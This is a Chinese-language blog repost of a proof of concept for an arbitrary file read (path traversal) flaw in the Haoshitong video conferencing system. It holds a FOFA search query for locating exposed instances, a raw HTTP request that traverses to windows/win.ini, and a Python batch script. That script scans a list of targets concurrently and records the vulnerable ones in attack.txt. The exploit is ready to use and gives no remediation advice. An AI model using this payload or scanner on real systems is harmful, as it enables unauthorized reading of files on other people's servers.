本文主要是介绍好视通视频会议系统存在任意文件读取漏洞复现 [附POC],希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
漏洞简介
好视通视频会议是由深圳市华视瑞通信息技术有限公司开发,其在国内率先推出了3G互联网视频会议,并成功应用于SAAS领域。
资产
FOFA:app="好视通-视频会议"
POC
GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
漏洞复现
使用Burp或Yakit进行发包测试
批量测试
pip install requests
然后运行脚本进行测试
import requests
import concurrent.futures
def check_vulnerability(target):
headers = {
"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
"Content-Length":"0"
}
try:
# print(target)
res = requests.get(f"{target}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini", headers=headers, timeout=5,verify=False)
if "extensions"in res.text and "CMCDLLNAME32" in res.text:
print(f"[+]{target}漏洞存在")
with open("attack.txt",'a') as fw:
fw.write(f"{target}\n")
else:
print(f"[-]{target}漏洞不存在")
except Exception as e:
print(f"[-]{target}访问错误")
if __name__ == "__main__":
print("------------------------")
print("微信公众号:知攻善防实验室")
print("------------------------")
print("target.txt存放目标文件")
print("attack.txt存放检测结果")
print("------------------------")
print("按回车继续")
import os
os.system("pause")
f = open("target.txt", 'r')
targets = f.read().splitlines()
print(targets)
# 使用线程池并发执行检查漏洞
with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor:
executor.map(check_vulnerability, targets)
这篇关于好视通视频会议系统存在任意文件读取漏洞复现 [附POC]的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!